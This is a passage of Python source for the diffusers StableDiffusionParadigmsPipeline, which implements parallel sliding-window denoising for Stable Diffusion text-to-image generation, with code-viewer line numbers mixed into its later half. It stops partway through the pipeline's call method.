class StableDiffusionParadigmsPipeline(
    DiffusionPipeline, TextualInversionLoaderMixin, LoraLoaderMixin, FromSingleFileMixin
):
    r"""
    Pipeline for text-to-image generation using a parallelized version of Stable Diffusion.

    This model inherits from [`DiffusionPipeline`]. Check the superclass documentation for the generic methods
    implemented for all pipelines (downloading, saving, running on a particular device, etc.).

    The pipeline also inherits the following loading methods:
        - [`~loaders.TextualInversionLoaderMixin.load_textual_inversion`] for loading textual inversion embeddings
        - [`~loaders.LoraLoaderMixin.load_lora_weights`] for loading LoRA weights
        - [`~loaders.LoraLoaderMixin.save_lora_weights`] for saving LoRA weights
        - [`~loaders.FromSingleFileMixin.from_single_file`] for loading `.ckpt` files

    Args:
        vae ([`AutoencoderKL`]):
            Variational Auto-Encoder (VAE) model to encode and decode images to and from latent representations.
        text_encoder ([`~transformers.CLIPTextModel`]):
            Frozen text-encoder ([clip-vit-large-patch14](https://huggingface.co/openai/clip-vit-large-patch14)).
        tokenizer ([`~transformers.CLIPTokenizer`]):
            A `CLIPTokenizer` to tokenize text.
        unet ([`UNet2DConditionModel`]):
            A `UNet2DConditionModel` to denoise the encoded image latents.
        scheduler ([`SchedulerMixin`]):
            A scheduler to be used in combination with `unet` to denoise the encoded image latents. Can be one of
            [`DDIMScheduler`], [`LMSDiscreteScheduler`], or [`PNDMScheduler`].
        safety_checker ([`StableDiffusionSafetyChecker`]):
            Classification module that estimates whether generated images could be considered offensive or harmful.
            Please refer to the [model card](https://huggingface.co/runwayml/stable-diffusion-v1-5) for more details
            about a model's potential harms.
        feature_extractor ([`~transformers.CLIPImageProcessor`]):
            A `CLIPImageProcessor` to extract features from generated images; used as inputs to the `safety_checker`.
    """
    _optional_components = ["safety_checker", "feature_extractor"]

    def __init__(
        self,
        vae: AutoencoderKL,
        text_encoder: CLIPTextModel,
        tokenizer: CLIPTokenizer,
        unet: UNet2DConditionModel,
        scheduler: KarrasDiffusionSchedulers,
        safety_checker: StableDiffusionSafetyChecker,
        feature_extractor: CLIPImageProcessor,
        requires_safety_checker: bool = True,
    ):
        super().__init__()

        if safety_checker is None and requires_safety_checker:
            logger.warning(
                f"You have disabled the safety checker for {self.__class__} by passing `safety_checker=None`. Ensure"
                " that you abide by the conditions of the Stable Diffusion license and do not expose unfiltered"
                " results in services or applications open to the public. Both the diffusers team and Hugging Face"
                " strongly recommend keeping the safety filter enabled in all public-facing circumstances, disabling"
                " it only for use-cases that involve analyzing network behavior or auditing its results. For more"
                " information, please have a look at https://github.com/huggingface/diffusers/pull/254 ."
            )

        if safety_checker is not None and feature_extractor is None:
            raise ValueError(
                f"Make sure to define a feature extractor when loading {self.__class__} if you want to use the safety"
                " checker. If you do not want to use the safety checker, you can pass `'safety_checker=None'` instead."
            )

        self.register_modules(
            vae=vae,
            text_encoder=text_encoder,
            tokenizer=tokenizer,
            unet=unet,
            scheduler=scheduler,
            safety_checker=safety_checker,
            feature_extractor=feature_extractor,
        )
        self.vae_scale_factor = 2 ** (len(self.vae.config.block_out_channels) - 1)
        self.image_processor = VaeImageProcessor(vae_scale_factor=self.vae_scale_factor)
        self.register_to_config(requires_safety_checker=requires_safety_checker)

        # Attribute to wrap the unet with torch.nn.DataParallel when running multiple denoising steps on multiple GPUs.
        self.wrapped_unet = self.unet

    # Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline.enable_vae_slicing
    def enable_vae_slicing(self):
        r"""
        Enable sliced VAE decoding. When this option is enabled, the VAE will split the input tensor in slices to
        compute decoding in several steps. This is useful to save some memory and allow larger batch sizes.
        """
        self.vae.enable_slicing()

    # Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline.disable_vae_slicing
    def disable_vae_slicing(self):
        r"""
        Disable sliced VAE decoding. If `enable_vae_slicing` was previously enabled, this method will go back to
        computing decoding in one step.
        """
        self.vae.disable_slicing()

    # Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline.enable_vae_tiling
    def enable_vae_tiling(self):
        r"""
        Enable tiled VAE decoding. When this option is enabled, the VAE will split the input tensor into tiles to
        compute decoding and encoding in several steps. This is useful for saving a large amount of memory and to allow
        processing larger images.
        """
        self.vae.enable_tiling()

    # Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline.disable_vae_tiling
    def disable_vae_tiling(self):
        r"""
        Disable tiled VAE decoding. If `enable_vae_tiling` was previously enabled, this method will go back to
        computing decoding in one step.
        """
        self.vae.disable_tiling()

    # Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline.enable_model_cpu_offload
    def enable_model_cpu_offload(self, gpu_id=0):
        r"""
        Offload all models to CPU to reduce memory usage with a low impact on performance. Moves one whole model at a
        time to the GPU when its `forward` method is called, and the model remains in GPU until the next model runs.
        Memory savings are lower than using `enable_sequential_cpu_offload`, but performance is much better due to the
        iterative execution of the `unet`.
        """
        if is_accelerate_available() and is_accelerate_version(">=", "0.17.0.dev0"):
            from accelerate import cpu_offload_with_hook
        else:
            raise ImportError("`enable_model_cpu_offload` requires `accelerate v0.17.0` or higher.")

        device = torch.device(f"cuda:{gpu_id}")

        if self.device.type != "cpu":
            self.to("cpu", silence_dtype_warnings=True)
            torch.cuda.empty_cache()  # otherwise we don't see the memory savings (but they probably exist)

        hook = None
        for cpu_offloaded_model in [self.text_encoder, self.unet, self.vae]:
            _, hook = cpu_offload_with_hook(cpu_offloaded_model, device, prev_module_hook=hook)

        if self.safety_checker is not None:
            _, hook = cpu_offload_with_hook(self.safety_checker, device, prev_module_hook=hook)

        # We'll offload the last model manually.
        self.final_offload_hook = hook

    # Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline._encode_prompt
    def _encode_prompt(
        self,
        prompt,
        device,
        num_images_per_prompt,
        do_classifier_free_guidance,
        negative_prompt=None,
        prompt_embeds: Optional[torch.FloatTensor] = None,
        negative_prompt_embeds: Optional[torch.FloatTensor] = None,
        lora_scale: Optional[float] = None,
    ):
        r"""
        Encodes the prompt into text encoder hidden states.

        Args:
            prompt (`str` or `List[str]`, *optional*):
                prompt to be encoded
            device: (`torch.device`):
                torch device
            num_images_per_prompt (`int`):
                number of images that should be generated per prompt
            do_classifier_free_guidance (`bool`):
                whether to use classifier free guidance or not
            negative_prompt (`str` or `List[str]`, *optional*):
                The prompt or prompts not to guide the image generation. If not defined, one has to pass
                `negative_prompt_embeds` instead. Ignored when not using guidance (i.e., ignored if `guidance_scale` is
                less than `1`).
            prompt_embeds (`torch.FloatTensor`, *optional*):
                Pre-generated text embeddings. Can be used to easily tweak text inputs, *e.g.* prompt weighting. If not
                provided, text embeddings will be generated from `prompt` input argument.
            negative_prompt_embeds (`torch.FloatTensor`, *optional*):
                Pre-generated negative text embeddings. Can be used to easily tweak text inputs, *e.g.* prompt
                weighting. If not provided, negative_prompt_embeds will be generated from `negative_prompt` input
                argument.
            lora_scale (`float`, *optional*):
                A lora scale that will be applied to all LoRA layers of the text encoder if LoRA layers are loaded.
        """
        # Set lora scale so that the monkey-patched LoRA
        # function of the text encoder can correctly access it.
        if lora_scale is not None and isinstance(self, LoraLoaderMixin):
            self._lora_scale = lora_scale

        if prompt is not None and isinstance(prompt, str):
            batch_size = 1
        elif prompt is not None and isinstance(prompt, list):
            batch_size = len(prompt)
        else:
            batch_size = prompt_embeds.shape[0]

        if prompt_embeds is None:
            # textual inversion: process multi-vector tokens if necessary
            if isinstance(self, TextualInversionLoaderMixin):
                prompt = self.maybe_convert_prompt(prompt, self.tokenizer)

            text_inputs = self.tokenizer(
                prompt,
                padding="max_length",
                max_length=self.tokenizer.model_max_length,
                truncation=True,
                return_tensors="pt",
            )
            text_input_ids = text_inputs.input_ids
            untruncated_ids = self.tokenizer(prompt, padding="longest", return_tensors="pt").input_ids

            if untruncated_ids.shape[-1] >= text_input_ids.shape[-1] and not torch.equal(
                text_input_ids, untruncated_ids
            ):
                removed_text = self.tokenizer.batch_decode(
                    untruncated_ids[:, self.tokenizer.model_max_length - 1 : -1]
                )
                logger.warning(
                    "The following part of your input was truncated because CLIP can only handle sequences up to"
                    f" {self.tokenizer.model_max_length} tokens: {removed_text}"
                )

            if hasattr(self.text_encoder.config, "use_attention_mask") and self.text_encoder.config.use_attention_mask:
                attention_mask = text_inputs.attention_mask.to(device)
            else:
                attention_mask = None

            prompt_embeds = self.text_encoder(
                text_input_ids.to(device),
                attention_mask=attention_mask,
            )
            prompt_embeds = prompt_embeds[0]

        prompt_embeds = prompt_embeds.to(dtype=self.text_encoder.dtype, device=device)

        bs_embed, seq_len, _ = prompt_embeds.shape
        # duplicate text embeddings for each generation per prompt, using mps friendly method
        prompt_embeds = prompt_embeds.repeat(1, num_images_per_prompt, 1)
        prompt_embeds = prompt_embeds.view(bs_embed * num_images_per_prompt, seq_len, -1)

        # get unconditional embeddings for classifier free guidance
        if do_classifier_free_guidance and negative_prompt_embeds is None:
            uncond_tokens: List[str]
            if negative_prompt is None:
                uncond_tokens = [""] * batch_size
            elif prompt is not None and type(prompt) is not type(negative_prompt):
                raise TypeError(
                    f"`negative_prompt` should be the same type as `prompt`, but got {type(negative_prompt)} !="
                    f" {type(prompt)}."
                )
            elif isinstance(negative_prompt, str):
                uncond_tokens = [negative_prompt]
            elif batch_size != len(negative_prompt):
                raise ValueError(
                    f"`negative_prompt`: {negative_prompt} has batch size {len(negative_prompt)}, but `prompt`:"
                    f" {prompt} has batch size {batch_size}. Please make sure that passed `negative_prompt` matches"
                    " the batch size of `prompt`."
                )
            else:
                uncond_tokens = negative_prompt

            # textual inversion: process multi-vector tokens if necessary
            if isinstance(self, TextualInversionLoaderMixin):
                uncond_tokens = self.maybe_convert_prompt(uncond_tokens, self.tokenizer)

            max_length = prompt_embeds.shape[1]
            uncond_input = self.tokenizer(
                uncond_tokens,
                padding="max_length",
                max_length=max_length,
                truncation=True,
                return_tensors="pt",
            )

            if hasattr(self.text_encoder.config, "use_attention_mask") and self.text_encoder.config.use_attention_mask:
                attention_mask = uncond_input.attention_mask.to(device)
            else:
                attention_mask = None

            negative_prompt_embeds = self.text_encoder(
                uncond_input.input_ids.to(device),
                attention_mask=attention_mask,
            )
            negative_prompt_embeds = negative_prompt_embeds[0]

        if do_classifier_free_guidance:
            # duplicate unconditional embeddings for each generation per prompt, using mps friendly method
            seq_len = negative_prompt_embeds.shape[1]

            negative_prompt_embeds = negative_prompt_embeds.to(dtype=self.text_encoder.dtype, device=device)

            negative_prompt_embeds = negative_prompt_embeds.repeat(1, num_images_per_prompt, 1)
            negative_prompt_embeds = negative_prompt_embeds.view(batch_size * num_images_per_prompt, seq_len, -1)

            # For classifier free guidance, we need to do two forward passes.
            # Here we concatenate the unconditional and text embeddings into a single batch
            # to avoid doing two forward passes
            prompt_embeds = torch.cat([negative_prompt_embeds, prompt_embeds])

        return prompt_embeds

    # Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline.run_safety_checker
    def run_safety_checker(self, image, device, dtype):
        if self.safety_checker is None:
            has_nsfw_concept = None
        else:
            if torch.is_tensor(image):
                feature_extractor_input = self.image_processor.postprocess(image, output_type="pil")
            else:
                feature_extractor_input = self.image_processor.numpy_to_pil(image)
            safety_checker_input = self.feature_extractor(feature_extractor_input, return_tensors="pt").to(device)
            image, has_nsfw_concept = self.safety_checker(
                images=image, clip_input=safety_checker_input.pixel_values.to(dtype)
            )
        return image, has_nsfw_concept

    # Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline.prepare_extra_step_kwargs
    def prepare_extra_step_kwargs(self, generator, eta):
        # Prepare extra kwargs for the scheduler step, since not all schedulers have the same signature.
        # eta (η) is only used with the DDIMScheduler; it will be ignored for other schedulers.
        # eta corresponds to η in the DDIM paper: https://arxiv.org/abs/2010.02502
        # and should be in [0, 1].

        accepts_eta = "eta" in set(inspect.signature(self.scheduler.step).parameters.keys())
        extra_step_kwargs = {}
        if accepts_eta:
            extra_step_kwargs["eta"] = eta

        # check if the scheduler accepts generator
        accepts_generator = "generator" in set(inspect.signature(self.scheduler.step).parameters.keys())
        if accepts_generator:
            extra_step_kwargs["generator"] = generator
        return extra_step_kwargs

    # Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline.check_inputs
    def check_inputs(
        self,
        prompt,
        height,
        width,
        callback_steps,
        negative_prompt=None,
        prompt_embeds=None,
        negative_prompt_embeds=None,
    ):
        if height % 8 != 0 or width % 8 != 0:
            raise ValueError(f"`height` and `width` have to be divisible by 8 but are {height} and {width}.")

        if (callback_steps is None) or (
            callback_steps is not None and (not isinstance(callback_steps, int) or callback_steps <= 0)
        ):
            raise ValueError(
                f"`callback_steps` has to be a positive integer but is {callback_steps} of type"
                f" {type(callback_steps)}."
            )

        if prompt is not None and prompt_embeds is not None:
            raise ValueError(
                f"Cannot forward both `prompt`: {prompt} and `prompt_embeds`: {prompt_embeds}. Please make sure to"
                " only forward one of the two."
            )
        elif prompt is None and prompt_embeds is None:
            raise ValueError(
                "Provide either `prompt` or `prompt_embeds`. Cannot leave both `prompt` and `prompt_embeds` undefined."
            )
        elif prompt is not None and (not isinstance(prompt, str) and not isinstance(prompt, list)):
            raise ValueError(f"`prompt` has to be of type `str` or `list` but is {type(prompt)}")

        if negative_prompt is not None and negative_prompt_embeds is not None:
            raise ValueError(
                f"Cannot forward both `negative_prompt`: {negative_prompt} and `negative_prompt_embeds`:"
                f" {negative_prompt_embeds}. Please make sure to only forward one of the two."
            )

        if prompt_embeds is not None and negative_prompt_embeds is not None:
            if prompt_embeds.shape != negative_prompt_embeds.shape:
                raise ValueError(
                    "`prompt_embeds` and `negative_prompt_embeds` must have the same shape when passed directly, but"
                    f" got: `prompt_embeds` {prompt_embeds.shape} != `negative_prompt_embeds`"
                    f" {negative_prompt_embeds.shape}."
                )

    # Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline.prepare_latents
    def prepare_latents(self, batch_size, num_channels_latents, height, width, dtype, device, generator, latents=None):
        shape = (batch_size, num_channels_latents, height // self.vae_scale_factor, width // self.vae_scale_factor)
        if isinstance(generator, list) and len(generator) != batch_size:
            raise ValueError(
                f"You have passed a list of generators of length {len(generator)}, but requested an effective batch"
                f" size of {batch_size}. Make sure the batch size matches the length of the generators."
            )

        if latents is None:
            latents = randn_tensor(shape, generator=generator, device=device, dtype=dtype)
        else:
            latents = latents.to(device)

        # scale the initial noise by the standard deviation required by the scheduler
        latents = latents * self.scheduler.init_noise_sigma
        return latents

    def _cumsum(self, input, dim, debug=False):
        if debug:
            # cumsum_cuda_kernel does not have a deterministic implementation,
            # so perform cumsum on cpu for debugging purposes
            return torch.cumsum(input.cpu().float(), dim=dim).to(input.device)
        else:
            return torch.cumsum(input, dim=dim)

    @torch.no_grad()
    @replace_example_docstring(EXAMPLE_DOC_STRING)
    def __call__(
        self,
        prompt: Union[str, List[str]] = None,
        height: Optional[int] = None,
        width: Optional[int] = None,
        num_inference_steps: int = 50,
        parallel: int = 10,
        tolerance: float = 0.1,
        guidance_scale: float = 7.5,
        negative_prompt: Optional[Union[str, List[str]]] = None,
        num_images_per_prompt: Optional[int] = 1,
        eta: float = 0.0,
        generator: Optional[Union[torch.Generator, List[torch.Generator]]] = None,
        latents: Optional[torch.FloatTensor] = None,
        prompt_embeds: Optional[torch.FloatTensor] = None,
        negative_prompt_embeds: Optional[torch.FloatTensor] = None,
        output_type: Optional[str] = "pil",
        return_dict: bool = True,
        callback: Optional[Callable[[int, int, torch.FloatTensor], None]] = None,
        callback_steps: int = 1,
        cross_attention_kwargs: Optional[Dict[str, Any]] = None,
        debug: bool = False,
    ):
        r"""
        The call function to the pipeline for generation.

        Args:
            prompt (`str` or `List[str]`, *optional*):
                The prompt or prompts to guide image generation. If not defined, you need to pass `prompt_embeds`.
            height (`int`, *optional*, defaults to `self.unet.config.sample_size * self.vae_scale_factor`):
                The height in pixels of the generated image.
            width (`int`, *optional*, defaults to `self.unet.config.sample_size * self.vae_scale_factor`):
                The width in pixels of the generated image.
            num_inference_steps (`int`, *optional*, defaults to 50):
                The number of denoising steps. More denoising steps usually lead to a higher quality image at the
                expense of slower inference.
            parallel (`int`, *optional*, defaults to 10):
                The batch size to use when doing parallel sampling. More parallelism may lead to faster inference but
                requires higher memory usage and can also require more total FLOPs.
            tolerance (`float`, *optional*, defaults to 0.1):
                The error tolerance for determining when to slide the batch window forward for parallel sampling. Lower
                tolerance usually leads to less or no degradation. Higher tolerance is faster but can risk degradation
                of sample quality. The tolerance is specified as a ratio of the scheduler's noise magnitude.
            guidance_scale (`float`, *optional*, defaults to 7.5):
                A higher guidance scale value encourages the model to generate images closely linked to the text
                `prompt` at the expense of lower image quality. Guidance scale is enabled when `guidance_scale > 1`.
            negative_prompt (`str` or `List[str]`, *optional*):
                The prompt or prompts to guide what to not include in image generation. If not defined, you need to
                pass `negative_prompt_embeds` instead. Ignored when not using guidance (`guidance_scale < 1`).
            num_images_per_prompt (`int`, *optional*, defaults to 1):
|
519 |
-
The number of images to generate per prompt.
|
520 |
-
eta (`float`, *optional*, defaults to 0.0):
|
521 |
-
Corresponds to parameter eta (η) from the [DDIM](https://arxiv.org/abs/2010.02502) paper. Only applies
|
522 |
-
to the [`~schedulers.DDIMScheduler`], and is ignored in other schedulers.
|
523 |
-
generator (`torch.Generator` or `List[torch.Generator]`, *optional*):
|
524 |
-
A [`torch.Generator`](https://pytorch.org/docs/stable/generated/torch.Generator.html) to make
|
525 |
-
generation deterministic.
|
526 |
-
latents (`torch.FloatTensor`, *optional*):
|
527 |
-
Pre-generated noisy latents sampled from a Gaussian distribution, to be used as inputs for image
|
528 |
-
generation. Can be used to tweak the same generation with different prompts. If not provided, a latents
|
529 |
-
tensor is generated by sampling using the supplied random `generator`.
|
530 |
-
prompt_embeds (`torch.FloatTensor`, *optional*):
|
531 |
-
Pre-generated text embeddings. Can be used to easily tweak text inputs (prompt weighting). If not
|
532 |
-
provided, text embeddings are generated from the `prompt` input argument.
|
533 |
-
negative_prompt_embeds (`torch.FloatTensor`, *optional*):
|
534 |
-
Pre-generated negative text embeddings. Can be used to easily tweak text inputs (prompt weighting). If
|
535 |
-
not provided, `negative_prompt_embeds` are generated from the `negative_prompt` input argument.
|
536 |
-
output_type (`str`, *optional*, defaults to `"pil"`):
|
537 |
-
The output format of the generated image. Choose between `PIL.Image` or `np.array`.
|
538 |
-
return_dict (`bool`, *optional*, defaults to `True`):
|
539 |
-
Whether or not to return a [`~pipelines.stable_diffusion.StableDiffusionPipelineOutput`] instead of a
|
540 |
-
plain tuple.
|
541 |
-
callback (`Callable`, *optional*):
|
542 |
-
A function that calls every `callback_steps` steps during inference. The function is called with the
|
543 |
-
following arguments: `callback(step: int, timestep: int, latents: torch.FloatTensor)`.
|
544 |
-
callback_steps (`int`, *optional*, defaults to 1):
|
545 |
-
The frequency at which the `callback` function is called. If not specified, the callback is called at
|
546 |
-
every step.
|
547 |
-
cross_attention_kwargs (`dict`, *optional*):
|
548 |
-
A kwargs dictionary that if specified is passed along to the [`AttentionProcessor`] as defined in
|
549 |
-
[`self.processor`](https://github.com/huggingface/diffusers/blob/main/src/diffusers/models/cross_attention.py).
|
550 |
-
debug (`bool`, *optional*, defaults to `False`):
|
551 |
-
Whether or not to run in debug mode. In debug mode, `torch.cumsum` is evaluated using the CPU.
|
552 |
-
|
553 |
-
Examples:
|
554 |
-
|
555 |
-
Returns:
|
556 |
-
[`~pipelines.stable_diffusion.StableDiffusionPipelineOutput`] or `tuple`:
|
557 |
-
If `return_dict` is `True`, [`~pipelines.stable_diffusion.StableDiffusionPipelineOutput`] is returned,
|
558 |
-
otherwise a `tuple` is returned where the first element is a list with the generated images and the
|
559 |
-
second element is a list of `bool`s indicating whether the corresponding generated image contains
|
560 |
-
"not-safe-for-work" (nsfw) content.
|
561 |
-
"""
|
562 |
-
# 0. Default height and width to unet
|
563 |
-
height = height or self.unet.config.sample_size * self.vae_scale_factor
|
564 |
-
width = width or self.unet.config.sample_size * self.vae_scale_factor
|
565 |
-
|
566 |
-
# 1. Check inputs. Raise error if not correct
|
567 |
-
self.check_inputs(
|
568 |
-
prompt, height, width, callback_steps, negative_prompt, prompt_embeds, negative_prompt_embeds
|
569 |
-
)
|
570 |
-
|
571 |
-
# 2. Define call parameters
|
572 |
-
if prompt is not None and isinstance(prompt, str):
|
573 |
-
batch_size = 1
|
574 |
-
elif prompt is not None and isinstance(prompt, list):
|
575 |
-
batch_size = len(prompt)
|
576 |
-
else:
|
577 |
-
batch_size = prompt_embeds.shape[0]
|
578 |
-
|
579 |
-
device = self._execution_device
|
580 |
-
# here `guidance_scale` is defined analog to the guidance weight `w` of equation (2)
|
581 |
-
# of the Imagen paper: https://arxiv.org/pdf/2205.11487.pdf . `guidance_scale = 1`
|
582 |
-
# corresponds to doing no classifier free guidance.
|
583 |
-
do_classifier_free_guidance = guidance_scale > 1.0
|
584 |
-
|
585 |
-
# 3. Encode input prompt
|
586 |
-
prompt_embeds = self._encode_prompt(
|
587 |
-
prompt,
|
588 |
-
device,
|
589 |
-
num_images_per_prompt,
|
590 |
-
do_classifier_free_guidance,
|
591 |
-
negative_prompt,
|
592 |
-
prompt_embeds=prompt_embeds,
|
593 |
-
negative_prompt_embeds=negative_prompt_embeds,
|
594 |
-
)
|
595 |
-
|
596 |
-
# 4. Prepare timesteps
|
597 |
-
self.scheduler.set_timesteps(num_inference_steps, device=device)
|
598 |
-
|
599 |
-
# 5. Prepare latent variables
|
600 |
-
num_channels_latents = self.unet.config.in_channels
|
601 |
-
latents = self.prepare_latents(
|
602 |
-
batch_size * num_images_per_prompt,
|
603 |
-
num_channels_latents,
|
604 |
-
height,
|
605 |
-
width,
|
606 |
-
prompt_embeds.dtype,
|
607 |
-
device,
|
608 |
-
generator,
|
609 |
-
latents,
|
610 |
-
)
|
611 |
-
|
612 |
-
# 6. Prepare extra step kwargs. TODO: Logic should ideally just be moved out of the pipeline
|
613 |
-
extra_step_kwargs = self.prepare_extra_step_kwargs(generator, eta)
|
614 |
-
extra_step_kwargs.pop("generator", None)
|
615 |
-
|
616 |
-
# # 7. Denoising loop
|
617 |
-
scheduler = self.scheduler
|
618 |
-
parallel = min(parallel, len(scheduler.timesteps))
|
619 |
-
|
620 |
-
begin_idx = 0
|
621 |
-
end_idx = parallel
|
622 |
-
latents_time_evolution_buffer = torch.stack([latents] * (len(scheduler.timesteps) + 1))
|
623 |
-
|
624 |
-
# We must make sure the noise of stochastic schedulers such as DDPM is sampled only once per timestep.
|
625 |
-
# Sampling inside the parallel denoising loop will mess this up, so we pre-sample the noise vectors outside the denoising loop.
|
626 |
-
noise_array = torch.zeros_like(latents_time_evolution_buffer)
|
627 |
-
for j in range(len(scheduler.timesteps)):
|
628 |
-
base_noise = randn_tensor(
|
629 |
-
shape=latents.shape, generator=generator, device=latents.device, dtype=prompt_embeds.dtype
|
630 |
-
)
|
631 |
-
noise = (self.scheduler._get_variance(scheduler.timesteps[j]) ** 0.5) * base_noise
|
632 |
-
noise_array[j] = noise.clone()
|
633 |
-
|
634 |
-
# We specify the error tolerance as a ratio of the scheduler's noise magnitude. We similarly compute the error tolerance
|
635 |
-
# outside of the denoising loop to avoid recomputing it at every step.
|
636 |
-
# We will be dividing the norm of the noise, so we store its inverse here to avoid a division at every step.
|
637 |
-
inverse_variance_norm = 1.0 / torch.tensor(
|
638 |
-
[scheduler._get_variance(scheduler.timesteps[j]) for j in range(len(scheduler.timesteps))] + [0]
|
639 |
-
).to(noise_array.device)
|
640 |
-
latent_dim = noise_array[0, 0].numel()
|
641 |
-
inverse_variance_norm = inverse_variance_norm[:, None] / latent_dim
|
642 |
-
|
643 |
-
scaled_tolerance = tolerance**2
|
644 |
-
|
645 |
-
with self.progress_bar(total=num_inference_steps) as progress_bar:
|
646 |
-
steps = 0
|
647 |
-
while begin_idx < len(scheduler.timesteps):
|
648 |
-
# these have shape (parallel_dim, 2*batch_size, ...)
|
649 |
-
# parallel_len is at most parallel, but could be less if we are at the end of the timesteps
|
650 |
-
# we are processing batch window of timesteps spanning [begin_idx, end_idx)
|
651 |
-
parallel_len = end_idx - begin_idx
|
652 |
-
|
653 |
-
block_prompt_embeds = torch.stack([prompt_embeds] * parallel_len)
|
654 |
-
block_latents = latents_time_evolution_buffer[begin_idx:end_idx]
|
655 |
-
block_t = scheduler.timesteps[begin_idx:end_idx, None].repeat(1, batch_size * num_images_per_prompt)
|
656 |
-
t_vec = block_t
|
657 |
-
if do_classifier_free_guidance:
|
658 |
-
t_vec = t_vec.repeat(1, 2)
|
659 |
-
|
660 |
-
# expand the latents if we are doing classifier free guidance
|
661 |
-
latent_model_input = (
|
662 |
-
torch.cat([block_latents] * 2, dim=1) if do_classifier_free_guidance else block_latents
|
663 |
-
)
|
664 |
-
latent_model_input = self.scheduler.scale_model_input(latent_model_input, t_vec)
|
665 |
-
|
666 |
-
# if parallel_len is small, no need to use multiple GPUs
|
667 |
-
net = self.wrapped_unet if parallel_len > 3 else self.unet
|
668 |
-
# predict the noise residual, shape is now [parallel_len * 2 * batch_size * num_images_per_prompt, ...]
|
669 |
-
model_output = net(
|
670 |
-
latent_model_input.flatten(0, 1),
|
671 |
-
t_vec.flatten(0, 1),
|
672 |
-
encoder_hidden_states=block_prompt_embeds.flatten(0, 1),
|
673 |
-
cross_attention_kwargs=cross_attention_kwargs,
|
674 |
-
return_dict=False,
|
675 |
-
)[0]
|
676 |
-
|
677 |
-
per_latent_shape = model_output.shape[1:]
|
678 |
-
if do_classifier_free_guidance:
|
679 |
-
model_output = model_output.reshape(
|
680 |
-
parallel_len, 2, batch_size * num_images_per_prompt, *per_latent_shape
|
681 |
-
)
|
682 |
-
noise_pred_uncond, noise_pred_text = model_output[:, 0], model_output[:, 1]
|
683 |
-
model_output = noise_pred_uncond + guidance_scale * (noise_pred_text - noise_pred_uncond)
|
684 |
-
model_output = model_output.reshape(
|
685 |
-
parallel_len * batch_size * num_images_per_prompt, *per_latent_shape
|
686 |
-
)
|
687 |
-
|
688 |
-
block_latents_denoise = scheduler.batch_step_no_noise(
|
689 |
-
model_output=model_output,
|
690 |
-
timesteps=block_t.flatten(0, 1),
|
691 |
-
sample=block_latents.flatten(0, 1),
|
692 |
-
**extra_step_kwargs,
|
693 |
-
).reshape(block_latents.shape)
|
694 |
-
|
695 |
-
# back to shape (parallel_dim, batch_size, ...)
|
696 |
-
# now we want to add the pre-sampled noise
|
697 |
-
# parallel sampling algorithm requires computing the cumulative drift from the beginning
|
698 |
-
# of the window, so we need to compute cumulative sum of the deltas and the pre-sampled noises.
|
699 |
-
delta = block_latents_denoise - block_latents
|
700 |
-
cumulative_delta = self._cumsum(delta, dim=0, debug=debug)
|
701 |
-
cumulative_noise = self._cumsum(noise_array[begin_idx:end_idx], dim=0, debug=debug)
|
702 |
-
|
703 |
-
# if we are using an ODE-like scheduler (like DDIM), we don't want to add noise
|
704 |
-
if scheduler._is_ode_scheduler:
|
705 |
-
cumulative_noise = 0
|
706 |
-
|
707 |
-
block_latents_new = (
|
708 |
-
latents_time_evolution_buffer[begin_idx][None,] + cumulative_delta + cumulative_noise
|
709 |
-
)
|
710 |
-
cur_error = torch.linalg.norm(
|
711 |
-
(block_latents_new - latents_time_evolution_buffer[begin_idx + 1 : end_idx + 1]).reshape(
|
712 |
-
parallel_len, batch_size * num_images_per_prompt, -1
|
713 |
-
),
|
714 |
-
dim=-1,
|
715 |
-
).pow(2)
|
716 |
-
error_ratio = cur_error * inverse_variance_norm[begin_idx + 1 : end_idx + 1]
|
717 |
-
|
718 |
-
# find the first index of the vector error_ratio that is greater than error tolerance
|
719 |
-
# we can shift the window for the next iteration up to this index
|
720 |
-
error_ratio = torch.nn.functional.pad(
|
721 |
-
error_ratio, (0, 0, 0, 1), value=1e9
|
722 |
-
) # handle the case when everything is below ratio, by padding the end of parallel_len dimension
|
723 |
-
any_error_at_time = torch.max(error_ratio > scaled_tolerance, dim=1).values.int()
|
724 |
-
ind = torch.argmax(any_error_at_time).item()
|
725 |
-
|
726 |
-
# compute the new begin and end idxs for the window
|
727 |
-
new_begin_idx = begin_idx + min(1 + ind, parallel)
|
728 |
-
new_end_idx = min(new_begin_idx + parallel, len(scheduler.timesteps))
|
729 |
-
|
730 |
-
# store the computed latents for the current window in the global buffer
|
731 |
-
latents_time_evolution_buffer[begin_idx + 1 : end_idx + 1] = block_latents_new
|
732 |
-
# initialize the new sliding window latents with the end of the current window,
|
733 |
-
# should be better than random initialization
|
734 |
-
latents_time_evolution_buffer[end_idx : new_end_idx + 1] = latents_time_evolution_buffer[end_idx][
|
735 |
-
None,
|
736 |
-
]
|
737 |
-
|
738 |
-
steps += 1
|
739 |
-
|
740 |
-
progress_bar.update(new_begin_idx - begin_idx)
|
741 |
-
if callback is not None and steps % callback_steps == 0:
|
742 |
-
callback(begin_idx, block_t[begin_idx], latents_time_evolution_buffer[begin_idx])
|
743 |
-
|
744 |
-
begin_idx = new_begin_idx
|
745 |
-
end_idx = new_end_idx
|
746 |
-
|
747 |
-
latents = latents_time_evolution_buffer[-1]
|
748 |
-
|
749 |
-
if not output_type == "latent":
|
750 |
-
image = self.vae.decode(latents / self.vae.config.scaling_factor, return_dict=False)[0]
|
751 |
-
image, has_nsfw_concept = self.run_safety_checker(image, device, prompt_embeds.dtype)
|
752 |
-
else:
|
753 |
-
image = latents
|
754 |
-
has_nsfw_concept = None
|
755 |
-
|
756 |
-
if has_nsfw_concept is None:
|
757 |
-
do_denormalize = [True] * image.shape[0]
|
758 |
-
else:
|
759 |
-
